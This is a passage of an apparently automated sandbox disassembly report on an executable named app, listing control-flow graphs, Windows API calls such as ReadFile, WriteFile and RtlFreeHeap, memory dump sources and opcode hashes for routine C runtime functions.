                                                                                                                                                                                                            control_flow_graph 660 7ff7ace9ae5c-7ff7ace9ae82 661 7ff7ace9ae84-7ff7ace9ae98 call 7ff7ace94354 call 7ff7ace94374 660->661 662 7ff7ace9ae9d-7ff7ace9aea1 660->662 676 7ff7ace9b28e 661->676 664 7ff7ace9b277-7ff7ace9b283 call 7ff7ace94354 call 7ff7ace94374 662->664 665 7ff7ace9aea7-7ff7ace9aeae 662->665 683 7ff7ace9b289 call 7ff7ace99ce0 664->683 665->664 667 7ff7ace9aeb4-7ff7ace9aee2 665->667 667->664 670 7ff7ace9aee8-7ff7ace9aeef 667->670 673 7ff7ace9aef1-7ff7ace9af03 call 7ff7ace94354 call 7ff7ace94374 670->673 674 7ff7ace9af08-7ff7ace9af0b 670->674 673->683 679 7ff7ace9af11-7ff7ace9af17 674->679 680 7ff7ace9b273-7ff7ace9b275 674->680 681 7ff7ace9b291-7ff7ace9b2a8 676->681 679->680 684 7ff7ace9af1d-7ff7ace9af20 679->684 680->681 683->676 684->673 685 7ff7ace9af22-7ff7ace9af47 684->685 688 7ff7ace9af7a-7ff7ace9af81 685->688 689 7ff7ace9af49-7ff7ace9af4b 685->689 693 7ff7ace9af83-7ff7ace9afab call 7ff7ace9c9fc call 7ff7ace99d48 * 2 688->693 694 7ff7ace9af56-7ff7ace9af6d call 7ff7ace94354 call 7ff7ace94374 call 7ff7ace99ce0 688->694 691 7ff7ace9af72-7ff7ace9af78 689->691 692 7ff7ace9af4d-7ff7ace9af54 689->692 696 7ff7ace9aff8-7ff7ace9b00f 691->696 692->691 692->694 721 7ff7ace9afc8-7ff7ace9aff3 call 7ff7ace9b684 693->721 722 7ff7ace9afad-7ff7ace9afc3 call 7ff7ace94374 call 7ff7ace94354 693->722 725 7ff7ace9b100 694->725 699 7ff7ace9b011-7ff7ace9b019 696->699 700 7ff7ace9b08a-7ff7ace9b094 call 7ff7acea296c 696->700 699->700 704 7ff7ace9b01b-7ff7ace9b01d 699->704 712 7ff7ace9b09a-7ff7ace9b0af 700->712 713 7ff7ace9b11e 700->713 704->700 709 7ff7ace9b01f-7ff7ace9b035 704->709 709->700 714 7ff7ace9b037-7ff7ace9b043 709->714 712->713 719 7ff7ace9b0b1-7ff7ace9b0c3 GetConsoleMode 712->719 717 7ff7ace9b123-7ff7ace9b143 ReadFile 713->717 714->700 715 7ff7ace9b045-7ff7ace9b047 714->715 715->700 720 7ff7ace9b049-7ff7ace9b061 715->720 723 7ff7ace9b149-7ff7ace9b151 717->723 724 7ff7ace9b23d-7ff7ace9b246 GetLastError 717->724 719->713 726 7ff7ace9b0c5-7ff7ace9b0cd 719->726 720->700 728 7ff7ace9b063-7ff7ace9b06f 720->728 721->696 722->725 723->724 730 7ff7ace9b157 723->730 733 7ff7ace9b263-7ff7ace9b266 724->733 734 7ff7ace9b248-7ff7ace9b25e call 7ff7ace94374 call 7ff7ace94354 724->734 727 7ff7ace9b103-7ff7ace9b10d call 7ff7ace99d48 725->727 726->717 732 7ff7ace9b0cf-7ff7ace9b0f1 ReadConsoleW 726->732 727->681 728->700 736 7ff7ace9b071-7ff7ace9b073 728->736 740 7ff7ace9b15e-7ff7ace9b173 730->740 742 7ff7ace9b112-7ff7ace9b11c 732->742 743 7ff7ace9b0f3 GetLastError 732->743 737 7ff7ace9b0f9-7ff7ace9b0fb call 7ff7ace942e8 733->737 738 7ff7ace9b26c-7ff7ace9b26e 733->738 734->725 736->700 747 7ff7ace9b075-7ff7ace9b085 736->747 737->725 738->727 740->727 749 7ff7ace9b175-7ff7ace9b180 740->749 742->740 743->737 747->700 753 7ff7ace9b182-7ff7ace9b19b call 7ff7ace9aa74 749->753 754 7ff7ace9b1a7-7ff7ace9b1af 749->754 760 7ff7ace9b1a0-7ff7ace9b1a2 753->760 757 7ff7ace9b1b1-7ff7ace9b1c3 754->757 758 7ff7ace9b22b-7ff7ace9b238 call 7ff7ace9a8b4 754->758 761 7ff7ace9b1c5 757->761 762 7ff7ace9b21e-7ff7ace9b226 757->762 758->760 760->727 763 7ff7ace9b1ca-7ff7ace9b1d1 761->763 762->727 765 7ff7ace9b1d3-7ff7ace9b1d7 763->765 766 7ff7ace9b20d-7ff7ace9b218 763->766 767 7ff7ace9b1f3 765->767 768 7ff7ace9b1d9-7ff7ace9b1e0 765->768 766->762 770 7ff7ace9b1f9-7ff7ace9b209 767->770 768->767 769 7ff7ace9b1e2-7ff7ace9b1e6 768->769 769->767 771 7ff7ace9b1e8-7ff7ace9b1f1 769->771 770->763 772 7ff7ace9b20b 770->772 771->770 772->762
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 3dbd079f25493cb00c0f377b89eb06eb2a655696f53ab85c59b8783cdb1b2f43
                                                                                                                                                                                                            • Instruction ID: e6f249b708edd59c1bfea9a30a6da65c4e7b3ae8e64d566eafbd167c0372c02e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dbd079f25493cb00c0f377b89eb06eb2a655696f53ab85c59b8783cdb1b2f43
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55C1F43290E686A1EA70AB1594442BDF7A0FF81BC0F970571FA4E237B1CE7CE8558761
                                                                                                                                                                                                            Function 00007FF7ACE9C360 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 850 7ff7ace9c360-7ff7ace9c385 851 7ff7ace9c653 850->851 852 7ff7ace9c38b-7ff7ace9c38e 850->852 853 7ff7ace9c655-7ff7ace9c665 851->853 854 7ff7ace9c390-7ff7ace9c3c2 call 7ff7ace99c14 852->854 855 7ff7ace9c3c7-7ff7ace9c3f3 852->855 854->853 857 7ff7ace9c3f5-7ff7ace9c3fc 855->857 858 7ff7ace9c3fe-7ff7ace9c404 855->858 857->854 857->858 859 7ff7ace9c414-7ff7ace9c429 call 7ff7acea296c 858->859 860 7ff7ace9c406-7ff7ace9c40f call 7ff7ace9b720 858->860 865 7ff7ace9c42f-7ff7ace9c438 859->865 866 7ff7ace9c543-7ff7ace9c54c 859->866 860->859 865->866 869 7ff7ace9c43e-7ff7ace9c442 865->869 867 7ff7ace9c5a0-7ff7ace9c5c5 WriteFile 866->867 868 7ff7ace9c54e-7ff7ace9c554 866->868 870 7ff7ace9c5d0 867->870 871 7ff7ace9c5c7-7ff7ace9c5cd GetLastError 867->871 872 7ff7ace9c556-7ff7ace9c559 868->872 873 7ff7ace9c58c-7ff7ace9c59e call 7ff7ace9be18 868->873 874 7ff7ace9c444-7ff7ace9c44c call 7ff7ace93950 869->874 875 7ff7ace9c453-7ff7ace9c45e 869->875 876 7ff7ace9c5d3 870->876 871->870 877 7ff7ace9c578-7ff7ace9c58a call 7ff7ace9c038 872->877 878 7ff7ace9c55b-7ff7ace9c55e 872->878 898 7ff7ace9c530-7ff7ace9c537 873->898 874->875 880 7ff7ace9c460-7ff7ace9c469 875->880 881 7ff7ace9c46f-7ff7ace9c484 GetConsoleMode 875->881 883 7ff7ace9c5d8 876->883 877->898 884 7ff7ace9c5e4-7ff7ace9c5ee 878->884 885 7ff7ace9c564-7ff7ace9c576 call 7ff7ace9bf1c 878->885 880->866 880->881 888 7ff7ace9c48a-7ff7ace9c490 881->888 889 7ff7ace9c53c 881->889 891 7ff7ace9c5dd 883->891 892 7ff7ace9c5f0-7ff7ace9c5f5 884->892 893 7ff7ace9c64c-7ff7ace9c651 884->893 885->898 896 7ff7ace9c496-7ff7ace9c499 888->896 897 7ff7ace9c519-7ff7ace9c52b call 7ff7ace9b9a0 888->897 889->866 891->884 899 7ff7ace9c623-7ff7ace9c62d 892->899 900 7ff7ace9c5f7-7ff7ace9c5fa 892->900 893->853 902 7ff7ace9c4a4-7ff7ace9c4b2 896->902 903 7ff7ace9c49b-7ff7ace9c49e 896->903 897->898 898->883 909 7ff7ace9c62f-7ff7ace9c632 899->909 910 7ff7ace9c634-7ff7ace9c643 899->910 907 7ff7ace9c613-7ff7ace9c61e call 7ff7ace94330 900->907 908 7ff7ace9c5fc-7ff7ace9c60b 900->908 905 7ff7ace9c510-7ff7ace9c514 902->905 906 7ff7ace9c4b4 902->906 903->891 903->902 905->876 911 7ff7ace9c4b8-7ff7ace9c4cf call 7ff7acea2a38 906->911 907->899 908->907 909->851 909->910 910->893 916 7ff7ace9c4d1-7ff7ace9c4dd 911->916 917 7ff7ace9c507-7ff7ace9c50d GetLastError 911->917 918 7ff7ace9c4df-7ff7ace9c4f1 call 7ff7acea2a38 916->918 919 7ff7ace9c4fc-7ff7ace9c503 916->919 917->905 918->917 923 7ff7ace9c4f3-7ff7ace9c4fa 918->923 919->905 921 7ff7ace9c505 919->921 921->911 923->919
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C47C
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7ACE9C34B), ref: 00007FF7ACE9C507
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                            • Opcode ID: d1123a7759acd2de89f70fbc91131bac1b02d2ce66ed859b546e10adeb5b6b1d
                                                                                                                                                                                                            • Instruction ID: 976b4d587a1ece77710c3918bf04aa5d5afe6dc9839d870e617b11c08f6cce7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1123a7759acd2de89f70fbc91131bac1b02d2ce66ed859b546e10adeb5b6b1d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D891F332F0D651A5F760BF2594402BDEBA0BB44B88F965179EE0E736A5CF38D442C720
                                                                                                                                                                                                            Function 00007FF7ACE9E80C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                            • Opcode ID: 1dd24f7105ff8e7d48a2fb442a16f04649d1343116b9e24a6dd38911d1b00d9f
                                                                                                                                                                                                            • Instruction ID: 170f9fa368eb4ea0dc854247a3a3d22b1a27bc73761924dda7b83de7270099bb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dd24f7105ff8e7d48a2fb442a16f04649d1343116b9e24a6dd38911d1b00d9f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34513B72F0A6119AFB28EB24844527CE7916B04359F921275EE2D63AF4DF3CE842C710
                                                                                                                                                                                                            Function 00007FF7ACE94704 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                            • Opcode ID: 63aa3601c86c8dfc24442af54b1f99864ddc5ecbce9f9230940c2bf8df8b37fb
                                                                                                                                                                                                            • Instruction ID: 417133dbb9fd28cdd27ecda7881c653a1f7f20a2f3b65087941487c5a573c9f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63aa3601c86c8dfc24442af54b1f99864ddc5ecbce9f9230940c2bf8df8b37fb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551A172E0D641AAF720EFB0D4503BDB3E1AB44B88F568534EE09676A8DF3CD45087A0
                                                                                                                                                                                                            Function 00007FF7ACE8AE3C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                                                                                            • Opcode ID: fe3ada7a8cc56a4ed65094338cfa1a217e5e95ba653fb5ab557310939df0f8c4
                                                                                                                                                                                                            • Instruction ID: 29700192a4efe9e48a7d437070b0e25b3d7a3c8b07590e134fd32ccb98d7251d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe3ada7a8cc56a4ed65094338cfa1a217e5e95ba653fb5ab557310939df0f8c4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D313D30A0E2C369FA24BB649A122B9B2919F41346FC61434E50D772F3DE2CE8558774
                                                                                                                                                                                                            Function 00007FF7ACE945B0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                            • Opcode ID: e466375c137080442015770c21472d3ddd744ca47b074c7543c7a5c04326b230
                                                                                                                                                                                                            • Instruction ID: c6bf98c19e0207ae2426b46a880b279a3e15c35de16de4c5cd03d4c283859393
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e466375c137080442015770c21472d3ddd744ca47b074c7543c7a5c04326b230
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0241A472D1D78253E714AB609500379E3A0FB95754F519334E65C13AE2DF7CE5E08750
                                                                                                                                                                                                            Function 00007FF7ACE8F2CC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
                                                                                                                                                                                                            • Instruction ID: fbf80394fc03612bad376d471496813a6d3cccc3fca5e8568ee1b65ace1a1466
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A251D731B0E2C296EA64BF25960067AF191BF44BA5F964631EE6D537E5CF3CE4408720
                                                                                                                                                                                                            Function 00007FF7ACE9B534 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B580
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B58A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                            • Opcode ID: 9f733d69f420b8b04d1076dad759c709488f53e52c8dcc29dc1aedb5cdeb4cec
                                                                                                                                                                                                            • Instruction ID: b236e0acb1143df32565c910cc485c5510d102f6c2de4b6e2855251ae603b22e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f733d69f420b8b04d1076dad759c709488f53e52c8dcc29dc1aedb5cdeb4cec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B11EF72A1DB8191DB20AB25A404069E362AB45FF4F950731EE7E277F8CF3CD0148700
                                                                                                                                                                                                            Function 00007FF7ACE948AC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948DF
                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                            • Opcode ID: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction ID: 6205ec6df0a70a499e3491a645bc1f50fae3bde877d72fe25803a1ac692541d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F11A33260D74292EB64AF14A40113AF7A0FB85771F911235FA9EA59F8EF3CD014CB20
                                                                                                                                                                                                            Function 00007FF7ACE99D48 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 09d488bb06d55175f79f30023c2eae0eb1538c267421da5f785fc5d583374eac
                                                                                                                                                                                                            • Instruction ID: 06288fbd5400c77673e17b42f5a7f8a5556b1bbcf222bc7e244591e59de3ca50
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09d488bb06d55175f79f30023c2eae0eb1538c267421da5f785fc5d583374eac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E04F70E0E60266FE18BBF25484079D1905F94741B860070D80DA62B1DE2CE9554670
                                                                                                                                                                                                            Function 00007FF7ACE99F58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
